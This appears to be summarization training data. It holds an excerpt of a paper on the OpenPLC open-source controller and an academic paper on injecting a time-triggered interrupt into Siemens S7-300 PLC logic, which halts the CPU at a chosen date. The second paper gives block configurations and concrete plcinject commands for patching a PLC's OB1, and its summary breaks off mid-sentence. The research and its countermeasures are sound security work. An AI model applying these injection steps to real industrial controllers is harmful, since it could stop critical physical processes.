So, instead of machine code for a specific processor, ANSI C code that could be compiled for any platform was generated. The only thing that had to be provided with this method was a C header to link the generated ANSI C functions to the target system. The OpenPLC Ladder Editor (Fig. 6) was created to fulfill these tasks. Basically, the OpenPLC Ladder Editor is a modified version of LDmicro, with reduced instructions (processor-specific instructions had to be removed), no support for direct compiling (it only generates ANSI C code) and a tool that can automatically link the generated ANSI C code with the OpenPLC firmware, compile everything using AVR GCC and upload the compiled software to the OpenPLC. The compiler tool is called every time the compile button is clicked. While the code for LDmicro was written in C++, the compilation tool was created in C# .NET, a very robust and modern language. The final result is a binary program uploaded to the OpenPLC CPU, containing both the ladder logic and the functions of the OpenPLC firmware.

Fig. 6. OpenPLC Ladder Editor software running on a PC

A. MODBUS Communication

MODBUS is an industry standard protocol for automation devices. Although the message format is maintained, there are some variations of this protocol depending on the physical interface it is used on. As the OpenPLC has Ethernet over TCP-IP, support for the MODBUS-TCP protocol was implemented. Only the most used functions of the protocol were implemented, as shown next:
- FC01 - Read Coil Status
- FC02 - Read Input Status
- FC03 - Read Holding Registers
- FC05 - Force Single Coil
- FC15 - Force Multiple Coils

B. Boards Communication

To be a modular system, each module of the OpenPLC must have a way to communicate with the CPU.
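The MODBUS-TCP function codes listed above share one request layout. The sketch below builds an FC01 (Read Coil Status) request using the standard MBAP framing from the MODBUS specification; it is a protocol illustration, not code from the OpenPLC firmware:

```python
import struct

def modbus_read_coils(transaction_id: int, unit_id: int,
                      start_addr: int, quantity: int) -> bytes:
    """Build an FC01 (Read Coil Status) MODBUS-TCP request frame."""
    # PDU: function code 0x01, starting address, number of coils
    pdu = struct.pack(">BHH", 0x01, start_addr, quantity)
    # MBAP header: transaction id, protocol id (always 0), length, unit id
    mbap = struct.pack(">HHHB", transaction_id, 0x0000, len(pdu) + 1, unit_id)
    return mbap + pdu

# Reading 8 coils starting at address 0 from unit 1 produces the 12-byte
# frame 0001 0000 0006 01 01 0000 0008.
```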
The RS-485 bus is the physical layer through which messages are sent, but it was necessary to create a protocol at the application layer to standardize the messages sent and received. The protocol created was called the OPLC Protocol. It is a simple protocol that encapsulates each message sent or received with information about the destination, the size of the message and the function to be executed.

TABLE I. OPLC PROTOCOL HEADER
| Start  | Size   | Function | Address | Data    |
| 1 Byte | 1 Byte | 1 Byte   | 1 Byte  | n Bytes |

Every message starts with a start byte, which is always 0x7E. The receiver will only process the message after receiving the start byte. The Size field must contain the size (in bytes) of the Data field only. The Function field is related to the Data field: what the receiver will do with the data received depends on the function. Five functions were implemented for the OPLC Protocol:
- 0x01 - Ask for the card type
- 0x02 - Change card logical address
- 0x03 - Read discrete inputs
- 0x04 - Set discrete outputs
- 0x05 - Error message

The Address field may hold the logical or the physical address of the card, according to the function requested. For example, functions 0x01 and 0x02 are addressed to the physical address, because they are related to low level commands, such as getting card information or changing the logical address.

V. RESULTS

To evaluate the OpenPLC as a real PLC, a benchmark had to be made comparing it with another controller. This was achieved using a model of a five floor building with an elevator, originally controlled by a Siemens S7-200 PLC. Modifications were made to the model enabling it to interchange PLCs easily for the tests. The elevator is moved by a DC motor attached to it. There are limit switches on every floor to indicate the elevator's position. Also, limit switches were installed at the top and bottom of the building to prevent the elevator from moving outside the permitted range.
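Returning to the OPLC Protocol header given in Table I above, its framing can be encoded and decoded in a few lines. The sketch below is an interpretation of the layout described there (start byte 0x7E, one-byte size, function and address, then data); it is not the actual OpenPLC source:

```python
START_BYTE = 0x7E  # every OPLC Protocol message begins with this byte

def oplc_encode(function: int, address: int, data: bytes = b"") -> bytes:
    """Frame layout from Table I: Start | Size | Function | Address | Data.
    Size counts the Data field only."""
    return bytes([START_BYTE, len(data), function, address]) + data

def oplc_decode(frame: bytes):
    """Split a received frame back into (function, address, data)."""
    if frame[0] != START_BYTE:
        raise ValueError("missing start byte 0x7E")
    size, function, address = frame[1], frame[2], frame[3]
    return function, address, frame[4:4 + size]
```

For instance, function 0x03 (read discrete inputs) addressed to the card at physical address 2 is the four-byte frame 7E 00 03 02.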
Light indicators on every floor were used to visually indicate when the elevator stops at the respective floor. Five push buttons were used to call the elevator to the desired floor. The ladder diagram for this task had already been written for the Siemens PLC using the Siemens Step 7 platform. It used 13 digital inputs and 10 digital outputs to fully control the model. The diagram was printed and exactly the same diagram was written for the OpenPLC using the same logic blocks, see Figure 10. The OpenPLC Ladder Editor was used to compile, simulate and upload the diagram to the OpenPLC. During tests, a bug in the ladder diagram was found. If the user held the push button related to the floor on which the elevator was located while pushing another button to send it to another floor, the system hung in an infinite loop. As expected, the OpenPLC behaved exactly the same way as the Siemens PLC, presenting the same bug. After correcting the ladder on both controllers, each one operated flawlessly. The response to diverse stimuli on each PLC was identical in every tested situation.

VI. CONCLUSION

The open source community is growing stronger every day. There are many projects, from software to hardware, with contributions from people all around the world. Creating an open source industrial controller from scratch is a very bold task. But thanks to the support of open source communities like Arduino and LDmicro, it was possible to create a prototype of a functional PLC comparable with a standardized industry controller. During tests, the OpenPLC behaved exactly the same way as other controllers, given the same input impulses. The MODBUS-TCP communication was tested using SCADA software from different vendors. It was possible to read inputs and outputs and force outputs as on any other PLC. Our next big step is to use the OpenPLC in a field application, evaluating its robustness, versatility and ease of use.

REFERENCES

[1] P.E. Moody and R.E.
Morley, How Manufacturing Will Work in the Year 2020, Simon and Schuster.
[2] R. Oshana and M. Kraeling, Software Engineering for Embedded Systems: Methods, Practical Techniques, and Applications, 1st ed. Newnes, 2013, pp. 12-20.
[3] K.H. John and M. Tiegelkamp, IEC 61131-3: Programming Industrial Automation Systems, 2nd ed. Springer, 2010, pp. 147-168.
[4] Atmel Corporation, ATmega2560, Atmel.com, 2014. Accessed 8 Jul. 2014. http://www.atmel.com/devices/atmega2560.aspx.
[5] Arduino, Arduino MEGA ADK, arduino.cc, 2014. Accessed 8 Jul. 2014. http://arduino.cc/en/Main/ArduinoBoardMegaADK.
[6] J. Westhues, Ladder Logic for PIC and AVR, cq.cx, 2014. Accessed 8 Jul. 2014. http://cq.cx/ladder.pl.
Summary:
Companies are always looking for ways to increase production. Rising consumerism pushes factories to produce more in less time. Industrial automation came as the solution to increase quality and production and to decrease costs. Since the early 70s, the PLC (Programmable Logic Controller) has dominated industrial automation by replacing relay logic circuits. However, due to its high cost, there are many places in the world where automation is still inaccessible. This paper describes the creation of a low-cost open source PLC, comparable to those already used in industrial automation, with a modular and simplified architecture and expansion capabilities. Our goal with this project is to create the first fully functional standardized open source PLC. We believe that, with enough help from the open source community, it will become a low cost solution to speed up development and industrial production in less developed countries.
Summarize:
Index Terms: Programmable Logic Controllers, Injection Attack, Time-of-Day Interrupt, Patching Attack

I. INTRODUCTION

Programmable logic controllers (PLCs) in industrial control systems (ICSs) are in direct connection with physical processes, e.g. production lines, electrical power grids and other critical plants. They are equipped with control logic that defines how to monitor and control these critical processes. Thus, their safety, durability, and predictable response times are the primary design concerns. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Mitsubishi, Schneider and Modicon. Each has its own proprietary firmware, programming language, communication protocols and maintenance software. An interesting fact is that the basic hardware and software architecture of all PLCs is similar, meaning that all PLCs contain variables and logic to control their inputs and outputs. The PLC code is written on an engineering station in the vendor's control logic language and then compiled into an executable format, e.g. MC7 for Siemens CPUs, before being downloaded to the PLC. Siemens S7 PLCs in the Simatic family [1] are estimated to hold over 30% of the worldwide PLC market [2]. Furthermore, the Simatic line of products includes the Totally Integrated Automation (TIA) Portal software, which functions as the engineering station. The TIA Portal and S7 PLCs communicate over the S7 network protocol. Unfortunately, most industrial controllers are not designed to be resilient against cyber-attacks. This means that if a PLC is compromised, then the entire physical process controlled by the affected PLC is also compromised, which eventually could lead to a disastrous incident. A traditional control logic attack involves modifying or replacing the original program code running on the target PLC by downloading malicious code or blocks to the target device.
To the best of our knowledge, all previous injection attacks were done online and strictly require the adversary to be connected to the target PLC until the attack is run. In contrast, our new approach is the first work that does not need any access to the target system at time zero of the attack: attackers can activate their attacks at a certain time offline, without being connected to the network. For running our experiments, we built on the already published attacking tool PLCinject [17]. We structured our approach to exploiting S7 PLCs into two phases:
1) Patching the control logic program of a PLC with an interrupt block, precisely the Time-of-Day (TOD) block named Organization Block 10 (we call it OB10 for the rest of this paper) in Simatic software. This is done online.
2) Activating the injected patch at a certain date and time without any need to be connected to the target PLC at that time. This is done offline.

The rest of the paper is organized as follows. Section II discusses related work. In section III we give an overview of the PLC's structure and its operating system, while our experimental setup is presented in section IV. Our attack approach is illustrated in section V, and we evaluate the potential disturbance resulting from our patch in section VI. In section VII we discuss our results and introduce possible mitigation solutions against our attack, and finally conclude this paper with our future works.

II. RELATED WORK

The main vulnerability involved in a typical injection attack is the lack of authentication measures in PLC protocols.

2021 4th IEEE International Conference on Industrial Cyber-Physical Systems (ICPS). DOI: 10.1109/ICPS49255.2021.9468226
Recent examples of such attacks on ICS occurred in Ukraine [3], [4]. These attacks involved taking control of the electrical distribution system and caused wide-spread blackouts. In 2014, the German federal office for information security reported a cyber-attack on an unnamed steel mill, where hackers manipulated and disrupted control systems to such a degree that a blast furnace could not be properly shut down, resulting in massive damage [5]. At Black Hat USA 2015, Klick et al. [6] demonstrated injection of malware into the control logic of a Simatic S7-300 PLC without disrupting any service. In a follow-on work, Spenneberg et al. [7] presented a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase the worm scans the network for new targets (PLCs). A Ladder Logic Bomb, malware written in ladder logic or one of the compatible languages, was introduced in [8]. Such malware is inserted by an attacker into existing control logic on PLCs. However, this scenario requires the attacker to be familiar with the programming languages the PLC is programmed in. A recent work presented a reverse-engineering attack called ICSREF [9], which can automatically generate malicious payloads against the target system and does not require any prior knowledge of the ICS. [10] demonstrated common-mode failure attacks targeting an industrial system that consists of redundant modules for recovery purposes. These modules are commonly used in nuclear power plant settings. The authors used DLL hijacking to intercept and modify the command-37 packets sent between the engineering station and the PLC, and could cause all the modules to fail. [11] presented a remote attack on the control logic of a PLC. The authors were able to infect the PLC and to hide the infection from the engineering software at the control center. They implemented their attack on a Schneider Electric Modicon M221 and its vendor-supplied engineering software (SoMachine-Basic).
Another work demonstrated a series of attacks targeting Siemens S7-1200 PLCs [12]. The investigation involves attacks like session stealing, phantom PLC, cross-connecting controllers and denial of S7 connections. In 2019, researchers in [13] showed that an attacker is able to transfer control logic to the data blocks of a PLC and then change the PLC's system control flow to execute the attacker's logic.

III. PROGRAMMABLE LOGIC CONTROLLER (PLC)

PLCs are industrial embedded devices that are programmed to monitor and control factory applications. They were originally designed for automation control and are considered hard real-time devices. The PLC program, stored in the integrated memory or on an external Multi Media Card (MMC), defines how the inputs and outputs are controlled. For communication or special purpose applications, the functionality of a CPU can be extended with external modules. In the following we give an overview of the PLC execution environment, operating system, user program, cycle time, and Time-of-Day interrupt.

A. PLC Execution Environment

Siemens PLCs run a real time operating system (OS), which cyclically executes the user program through four steps as shown in figure 1. The CPU first checks the status of all inputs, i.e. it takes an image of the inputs (e.g. sensors, switches, etc.) and saves it in the I/O memory. Please note that by taking an image we mean that the CPU saves a binary value representing the inputs in a specific place in the memory. Afterwards, the logic control program is executed in time slices with a duration of approximately 1 msec. Each time slice is divided into three parts, which are executed sequentially: the operating system, the user program and the communication. The number of time slices depends significantly on the current user program. However, after the program execution has ended, the CPU updates all the output statuses, i.e. updates the image of outputs saved in the I/O memory.
Then, the CPU returns to the start of the cycle and restarts the cycle time monitoring [14].

B. PLC Operating System

Siemens provides its Totally Integrated Automation (TIA) Portal software to engineers for developing PLC programs. It consists of two main components: STEP 7 as the development environment for PLCs and WinCC to configure Human Machine Interfaces (HMIs). Engineers are able to program PLCs in one of the following programming concepts: Ladder Diagram (LAD), Function Block Diagram (FBD), Structured Control Language (SCL) and Statement List (STL).

C. User Program

PLC programs are divided into the following units: Organization Blocks (OBs), Functions (FCs), Function Blocks (FBs), Data Blocks (DBs), System Functions (SFCs), System Function Blocks (SFBs) and System Data Blocks (SDBs). OBs, FCs and FBs contain the actual code, while DBs provide storage for data structures and SDBs for the current PLC configuration. A simple PLC program consists of at least one organization block called OB1, which is comparable to the main() function in a traditional C program. In more complex programs, engineers can encapsulate code using functions (FCs) and function blocks (FBs); the only difference is an additional data block (DB) as a parameter when calling an FB. The SFCs and SFBs are built into the PLC, and the operating system calls the main block (OB1) cyclically to execute the user program.

D. PLC Cycle Time

The cycle time is the time required by the operating system to run the main program and all program sections that interrupt its cycle (e.g. executing other blocks) and system activities (e.g. updating the process image). An interesting fact is that the cycle time is not the same in every cycle; it highly depends on the complexity of the current user program and on the events interrupting its execution. Figure 2 presents the execution of a program interrupted by events in a PLC.
In normal operation, if an event occurs, the block currently being executed is interrupted at a command boundary and a different organization block that is assigned to the particular event is called. Once the new organization block has been executed, the cyclic program resumes at the point at which it was interrupted.

Fig. 1: Simplified sequence of a PLC cycle
Fig. 2: The execution process of a program interrupted in an S7-300 PLC

This holds true as long as the maximum allowed cycle time (150 msec by default) is not exceeded. In other words, if there are too many interrupt OBs called in the main OB1, the entire cycle time might extend beyond what is set in the PLC hardware configuration. Exceeding the maximum allowed execution cycle generates a software error, and the PLC calls a specific block to handle this error, i.e. OB80. There are two cases for handling this error:
1) The PLC turns to stop mode if OB80 is not loaded in the main program.
2) The PLC executes the instructions that OB80 is programmed with, e.g. an alarm.

STEP 7 provides the user with many possible interrupt blocks, e.g. Time-of-Day interrupt (OB10 to OB17), Time-Delay interrupt (OB20 to OB23), Cyclic interrupt (OB30 to OB38), Hardware interrupt (OB40 to OB47), etc. In this work, we are only interested in the Time-of-Day (TOD for the rest of this paper) interrupt block OB10.

E. Time-Of-Day Interrupt (OB10)

Siemens CPUs allow the user to interrupt the main program (OB1) at different intervals. Meaning that the cyclic
execution process of the main program will be suspended at a specified time set by the user, the CPU jumps to execute all the instructions that the corresponding interrupt block is programmed with (here OB10), and after OB10 has been processed, the CPU resumes executing the main program at the point where it was interrupted. This interrupt might occur once, every minute, hourly, daily, weekly, monthly, or at the end of the month, depending on the needs. In order to start a TOD interrupt in normal operation, an operator first needs to set and then to activate this interrupt. S7-300 PLCs support up to three possibilities to configure a TOD interrupt:
- Automatic start of the TOD interrupt. This can be achieved by setting and activating the TOD interrupt per configuration.
- Setting the TOD interrupt per configuration and then activating it by calling the SFC30 (ACT_TINT) instruction in the logic program.
- Setting the TOD interrupt by calling the SFC28 (SET_TINT) instruction and then activating it by calling the SFC30 (ACT_TINT) instruction.

The first two methods are not practical in our attack, as they both require the attacker to have access to the TIA Portal at the engineering station and to configure the interrupt entirely/partly there. Therefore, we use the third method to set a TOD interrupt in our malicious code, i.e. SFC28 and SFC30, as illustrated later in section V.

IV. EXPERIMENTAL SET-UP

In this section, we describe our experimental set-up, starting with the process to be controlled and presenting the equipment used afterwards.

A. The physical process to be controlled

In our experiments, we use the following application example: there are two aquariums filled with water that is pumped from one to the other until a certain level is reached, and then the pumping direction is inverted, see figure 3.
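The pumping behaviour just described (fill until a level is reached, then invert) can be captured in a toy model. The sensor roles and names below are assumptions for illustration; the actual wiring and control logic are detailed in the following subsections:

```python
# Toy model of the two-aquarium process: keep pumping in the current
# direction until the receiving aquarium reports full, then invert.

def pump_direction(a_full: bool, b_full: bool, current: str) -> str:
    if current == "A->B" and b_full:
        return "B->A"
    if current == "B->A" and a_full:
        return "A->B"
    return current
```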
The two PLCs used in this application are connected to the engineering station (TIA Portal) via an Ethernet cable, and they exchange data over the network using S7 communication to control the water level in each aquarium. The control process in this set-up runs cyclically as follows: PLC.1 (S7 315-2 DP) reads the input signals coming from sensors 1, 2, 3 and 4. The two upper sensors (num. 1, 3) installed on both aquariums report to PLC.1 when the aquariums are full, while the two lower sensors (num. 2, 4) report to PLC.1 when the aquariums are empty. After that, PLC.1 sends the sensor readings to PLC.2 (S7 315-2 PN/DP) using an industrial Ethernet Communication Processor (IE-CP 343-1 Lean). Then PLC.2 powers the pumps on/off depending on the sensor readings received from PLC.1. (Please note that we are using this setup also in experiments run earlier, i.e. this description is by default very similar to the one in our earlier publications [20], [21], but we keep it here to ensure the paper is self-contained.)

B. Hardware Equipment

Our testbed has the following components: ICS operator, attacker machine, PLCs, communication processor, sensors and pumps, which are described in detail in the following:
- ICS Operator: a device that is connected to the PLC/CP using the TIA Portal software. Here, we use version 15.2 and Windows 7 as operating system.
- Attacker Machine: a device that sneakily connects to the system without appropriate credentials. In our experiments, the attacker uses the operating system Linux Ubuntu 18.04.1 LTS running on a laptop.
- PLCs S7-300: as mentioned before, we use Siemens products in our experiments, particularly CPUs from the 300 family. The PLCs used in this work are the S7 315-2 PN/DP and the S7 315-2 DP.
- Four capacitive proximity sensors: in our testbed, these are four sensors from Sick, type CQ35-25NPP-KC1, with a sensing range of 25 mm and electrical wiring DC 4-wire.
- Two Pumps: here, two DC-Runner 1.1 pumps from Aqua Medic with transparent pump housing, 0-10 V connection for external control, maximum pumping output 1200 l/h and maximum pumping height 1.5 m.

C. Attacker Model and Attack Surface

With regard to the type of attack we consider, we assume that the attacker has no prior knowledge about the actual process controlled by the PLCs, how the PLCs are connected, which communication protocols the PLCs use, or the logic program running on each. We also assume that the attacker already has access to the network and is capable of sending packets to the PLCs. Please note that compromising the ICS network and scanning the industrial network in order to obtain the IP addresses of the connected devices are out of the scope of this work; this can be achieved via typical attack vectors in our IT world, such as an infected USB stick or a vulnerable web server for network compromise, followed by running NMAP, SNMP or other network scanners to get the target IP address. Our attack scenario is network based, and can be successfully launched by any attacker with network access to the target PLC. In this work, the attack surface is a combination of device design and software implementation; more precisely, it is the implementation of the network stack, the PLC-specific protocol and the PLC operating system.

Footnotes:
2. https://support.industry.siemens.com/cs/document/109752566/simatic-step-7-and-wincc-v15-trial-download-?dti=0&lc=en-US
3. https://www.microsoft.com/de-de/software-download/windows7
4. https://ubuntu.com/download/desktop
5. https://www.dell.com/support/home/de/de/debsdt1/productsupport/product/latitude-e6510/overview
6. https://support.industry.siemens.com/cs/pd/480032?pdti=td&dl=en&lc=en-WW
7. https://support.industry.siemens.com/cs/pd/155410?pdti=td&dl=en&lc=en-DE
8. https://www.sick.com/de/en/proximity-sensors/capacitive-proximitysensors/cq/cq35-25npp-kc1/p/p244267
9. https://www.aquariumspecialty.com/aqua-medic-dc-runner-1-2-pump.html

Fig. 3: Example application of our control process

V. ATTACK DESCRIPTION

As in a typical injection attack, we patch our malicious code (the TOD interrupt) into the original logic code of the target PLC. The attacker's code is located at the very beginning of the main code (OB1), and the CPU checks whether the condition of the interrupt is met in every single execution cycle. Meaning that the attacker's code will always be checked, but only executed when the date and time of the CPU's clock match the date and time set by the attacker. Here, we have two cases:
- The date of the CPU's clock matches the attack date. The CPU immediately halts executing OB1, stores the breaking point's location in a dedicated register, and jumps to execute the corresponding interrupt block (in our example OB10).
- The date of the CPU's clock does not match the attack date. The CPU resumes executing OB1 after checking the interrupt condition, without activating the interrupt.

As mentioned earlier in section I, we use the tool PLCinject, published in [6], to inject the target PLC with our malicious blocks. This tool is written in the C language and is publicly available; see [17] for more information about its functionality. In the following we illustrate the three main steps that we follow to exploit the target PLC.

A. Preparation Phase (Offline)

As mentioned earlier in section I, the MC7 bytecode is the native form of PLC code. This means that before downloading the malicious blocks to the target, the attacker is required to obtain compiled versions of all the blocks to be injected, e.g. SFC28, SFC30, OB10, DB1. To achieve this, we open the TIA Portal and program a TOD interrupt, using only software call instructions, i.e.
using the SFC28 and SFC30 blocks, as follows:

1) Configuring SFC28 (SET_TINT): The SFC28 block is used to set the TOD interrupt and has five parameters, as shown in figure 4. The OB_NR parameter is assigned the number of the organization block to be called. As we aim to use a TOD interrupt, we assign this parameter the number 10. The SDT parameter is set to the date and time of the interrupt, i.e. the start time of the attack. For the purpose of flexibility, we assign SDT to a date variable stored in a data block, e.g. DB1.Date. Please note that the date variable includes the year, month, day, hour, and minutes, while the seconds and milliseconds of the determined date are ignored and set to 0. Using the date variable stored in the data block DB1 to assign this parameter allows us to change the date of the attack at any time by only modifying the DB1.Date variable, avoiding reprogramming the entire malicious code all over again. Afterwards, we set how often we want the interrupt to occur from the start date (SDT) onwards. In our example, interrupting OB1 once is sufficient, as the interrupt block puts the CPU in stop mode, as we show in the next subsection. The word W#16#0000 in the PERIOD parameter allows OB10 to be executed only one time, when there is a match between the attack date (SDT) and the date of the CPU (CPU clock). The actual parameter of RET_VAL contains an error code to report if an error occurs while the function is active. We assign this parameter to an integer variable stored in DB1 called error, i.e. DB1.error.

Fig. 4: Configuration of SFC28 (SET_TINT) in SCL

2) Configuring SFC30 (ACT_TINT):

Fig. 5: Configuration of SFC30 (ACT_TINT) in SCL

After configuring SFC28 successfully, we need to activate the interrupt in the main program. This is done by adding SFC30 (ACT_TINT) to OB1.
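The SET_TINT/ACT_TINT pair configured above can be mirrored by a small Python model: the start date is stored with seconds and milliseconds zeroed, nothing fires until the interrupt is activated, and a firing check runs against the CPU clock each cycle. Class and method names here are illustrative, not the Simatic API:

```python
from datetime import datetime

class TodInterrupt:
    """Behavioural sketch of a TOD interrupt set via SFC28 and SFC30."""

    def __init__(self):
        self.sdt = None
        self.active = False

    def set_tint(self, ob_nr: int, sdt: datetime) -> None:
        # SFC28 (SET_TINT): seconds/milliseconds of the date are ignored
        self.ob_nr = ob_nr
        self.sdt = sdt.replace(second=0, microsecond=0)

    def act_tint(self) -> None:
        # SFC30 (ACT_TINT): activate the previously set interrupt
        self.active = True

    def due(self, cpu_clock: datetime) -> bool:
        # evaluated each cycle: OB10 fires only on an exact minute match
        return (self.active and self.sdt is not None
                and cpu_clock.replace(second=0, microsecond=0) == self.sdt)
```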
Figure 5 shows the configuration of this block. We replace OB_NR with the number of the OB to be activated (OB10), and set the RET_VAL parameter to the integer variable in DB1 (DB1.error).

3) Configuring the TOD organization block (OB10): The attacker's code to be executed at the time defined in SDT is programmed in a separate organization block, i.e., OB10. In this work, OB10 aims to put the CPU into stop mode. This is done using SFC46, also called STP in the Simatic software. The STP block changes the CPU to stop mode once it is executed. An interesting fact is that the STP block has no parameters and can be executed without any dependencies. This makes our attack very simple but also very effective; it might cause significant harm if a PLC in a critical infrastructure is unexpectedly forced into stop mode. Moreover, our approach enables the attacker to program OB10 with any additional or different malicious code causing other abnormal behaviour of the PLC, e.g., resetting status word registers, modifying an input/output, etc.

After configuring our malicious blocks, we downloaded each block from the TIA Portal to the PLC separately, and then uploaded each block to the attacker machine using our Python script based on the python-snap7 library,10 specifically the function full_upload(type, block number). For our example, we successfully retrieved all the blocks in their MC7 version by replacing the function's parameters with the corresponding block name and number; e.g., for OB10, we set the parameters to OB and 10, respectively.

10 https://pypi.org/project/python-snap7/

B.
Patching the Attacker Blocks (Online)

After obtaining all required blocks in their MC7 versions, we can patch any S7 PLC using our PLCinject tool by executing the following command:

plcinject -c [PLC's IP address] -r [rack=0] -s [slot=2] -p [blocks to be patched] -b [blocks to be called] -o [blocks to be added] -f [path of the blocks]

For a better understanding of the tool, the following two commands patch the target PLC successfully, as shown in Fig. 6:

1) Downloading OB10 and DB1 to the PLC's program:
plcinject -c 192.168.0.1 -r 0 -s 2 -o OB10 DB1 -f /Home/User/Path

2) Injecting OB1 with the SFC28 and SFC30 blocks:
plcinject -c 192.168.0.1 -r 0 -s 2 -p OB1 -b SFC28 SFC30 -f /Home/User/Path

In the first command, we use only the -o parameter, which downloads new blocks to the program of the PLC located at IP address 192.168.0.1. In the second command, we use both the -p and -b parameters, which first upload OB1 from the target PLC, inject OB1 with call instructions to the already configured interrupt blocks SFC28 and SFC30, and then push the injected OB1 back to the PLC. Note that the attacker needs to execute the above commands in this order, i.e., download OB10 and DB1 first, before injecting OB1 with the interrupt blocks. This is because the parameters in both SFC28 and SFC30 refer to parameters defined in the data block DB1 and in OB10; injecting OB1 with the interrupt blocks before downloading DB1 and OB10 would cause a software error, and the CPU would enter software-error mode.

C. Attacking Phase (Offline)

After a successful injection, precisely with the next execution cycle of the PLC, the patched OB1 will be executed, i.e., the CPU checks the interrupt condition in each execution cycle. Our patch remains idle as long as the interrupt condition is not met.
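The scan-cycle behaviour described above (the interrupt condition is evaluated every cycle, but with PERIOD = W#16#0000 the interrupt OB runs exactly once) can be sketched in a few lines of Python. This is an illustrative model of the semantics, not S7 firmware behaviour; the minute-granularity comparison follows the earlier note that the seconds and milliseconds of SDT are set to 0, and the use of >= rather than strict equality is our assumption.

```python
from datetime import datetime


def tod_due(cpu_clock: datetime, sdt: datetime) -> bool:
    """True once the CPU clock reaches the start date/time (SDT).
    Seconds and milliseconds of SDT are ignored, as with SET_TINT."""
    trunc = lambda t: t.replace(second=0, microsecond=0)
    return trunc(cpu_clock) >= trunc(sdt)


class SingleShotTint:
    """Models a TOD interrupt with PERIOD = W#16#0000 (fire once)."""

    def __init__(self, sdt: datetime):
        self.sdt, self.fired = sdt, False

    def scan_cycle(self, cpu_clock: datetime) -> bool:
        """Called once per OB1 execution cycle; True = OB10 runs now."""
        if not self.fired and tod_due(cpu_clock, self.sdt):
            self.fired = True
            return True
        return False
```

Until scan_cycle returns True the patch stays idle; after the first activation it never fires again, matching the one-shot PERIOD setting.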
Once the date of the attack matches the date of the CPU, the interrupt is activated and block OB10 is executed. In our example, this enables the attacker to force the CPU into stop mode even while disconnected. Thus, if the attacker can push his malicious code into a target PLC once he has compromised the security measures, he can keep the injection idle inside the PLC for hours, days, months, or even years, as the physical process is not disturbed before the attack date.

Fig. 6: Scheme of patching the PLC's code. (a) Original program. (b) Patched program by the attacker.

Please note that after patching the PLC, and before the zero point of the attack, the engineering station can only detect this injection if the ICS operator requests the program that the PLC runs and discovers the difference between the original code at the engineering station and the patched program running in the PLC.

VI. EVALUATION

To assess the potential disturbance in executing the user's program (OB1) due to our patch, we measured the execution cycle time of OB1 for three different scenarios:
1. Normal operation, i.e., before patching the PLC.
2. Idle attack, i.e., after patching the PLC and before the interrupt is activated.
3. Activated attack, i.e., after the interrupt is executed.

An interesting fact is that Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE. Therefore, we added a small SCL code snippet to our control program that stores the last cycle time in a separate data block. We recorded 800 execution cycles for each scenario, calculated the arithmetic mean and median values, and present all the measurements in a boxplot, as shown in Fig. 7.
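The per-scenario summary statistics can be reproduced offline. The helper below is our own sketch (the sample values in the usage are made up for illustration, not the paper's raw measurements); it computes the arithmetic mean and median the same way.

```python
import statistics


def cycle_stats(cycle_times_ms):
    """Arithmetic mean and median of recorded OB1 cycle times (ms),
    as read from OB1_PREV_CYCLE and logged to a data block."""
    return {
        "mean": statistics.mean(cycle_times_ms),
        "median": statistics.median(cycle_times_ms),
    }
```

For example, cycle_stats([1.5, 2.0, 2.5]) yields a mean and median of 2.0 ms each.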
Our investigations showed that the mean execution time of the patched OB1 is approximately 2 ms, only slightly higher than the mean execution time of the original OB1, which is almost 1.75 ms. This means that checking the interrupt condition in each execution cycle while processing the patched OB1 does not disturb the physical process being controlled. As Fig. 7 also shows, there are no recorded execution cycles after the interrupt condition is met and OB10 is executed. This is because the CPU turned into stop mode after processing the STP block that OB10 is programmed with. Based on our analysis, we conclude that the ICS operator can only detect our patch if he requests the program that the infected PLC runs.

Fig. 7: Boxplot of the measured execution cycles of OB1 before the patch, after the patch (i.e., in idle mode), and after activating the TOD block

VII. DISCUSSION AND FUTURE WORK

In this paper, we presented a new attack approach for compromising S7 PLCs at a certain date and time without requiring the attacker to be connected to the target device at that time. For a practical implementation, we performed the attack on real hardware and software used in industrial settings, and successfully turned the CPU into stop mode at a predetermined time even when the attacker machine was offline. Our investigation showed that an attacker who is able to patch the PLC can activate his patch at a later time of his choosing, and that the patch neither disturbs the execution of the control logic nor exceeds the maximum allowed execution cycle time. However, our attack has limitations. The TIA Portal can monitor the execution time of the main program with a watchdog dedicated to killing the main program if the execution time becomes too long (over 150 ms by default). So an attacker should be aware of
the fact that any additional malicious blocks he wants to patch, together with the original program, must not exceed the overall maximum execution time of 150 ms; otherwise the CPU reports an error (OB80) and reveals the attack at a very early stage. Siemens protects its PLCs with passwords, providing three different protection levels: no protection, write protection, and read-write protection. Thus, password-protected PLCs will immediately reject our patch once we attempt to push our malicious code into the PLC. In fact, however, an attacker can still bypass the authentication, as reported in many previous events [18], [19], [21]. So, if the PLC is password protected, he first needs to bypass the password before patching the target; after the patch, it does not matter whether new security measures are introduced, a new password is set, the PLC is kept offline, etc.

From a security point of view, we suggest several countermeasures to our attack, such as protection and detection of control logic. The first step to protect these systems is to improve the isolation from other networks [15], combining this with standard security practices [16] and defence-in-depth security in the control systems. In addition, a digital signature should be applied not only to the firmware, as most PLC vendors do, but also to the control logic. Furthermore, a mechanism that checks the protocol header, which contains information about the type of the payload, is also recommended as a solution to detect and block any potential unauthorized transfer of control logic.

The exploit of S7 PLCs presented in this paper is efficient, and in the future we aim to investigate our attack against more modern S7 PLCs, e.g., S7-1200 and S7-1500 CPUs, as Siemens claims that its new devices are more resilient against cyber-attacks and secured by improved measures and integrity checks.
Therefore, investigating the security of such devices will be more challenging and complex.
Summary:
Industrial control system (ICS) architectures consist of programmable logic controllers (PLCs) that communicate with an engineering station on one side and control a certain physical process on the other. Siemens PLCs, particularly S7-300 controllers, are widely used in industrial systems, and modern critical infrastructures rely heavily on them. Unfortunately, security features are largely absent in such devices, or are ignored or disabled because security is often at odds with operations. As a consequence of the already reported vulnerabilities, it is possible to compromise PLCs and perhaps even the corporate IT network. In this paper we show that such PLCs are vulnerable and demonstrate that exploiting the execution process of the logic program running in a PLC is feasible. We target the logic program by injecting a Time-of-Day (TOD) interrupt code, which interrupts the execution sequence of the control logic at a time of the attacker's choosing. This is the first work that allows external adversaries to patch their malicious code once they access exposed PLCs, keep their attack idle inside the infected device, and then activate the attack at a later time without even being connected to the target at the attack date. In contrast to all previous works, this new approach opens the door for attackers to compromise PLCs while being offline at the zero point of the attack. For a realistic scenario, we implemented our attack on a real small industrial setting using S7-300 PLCs, using our 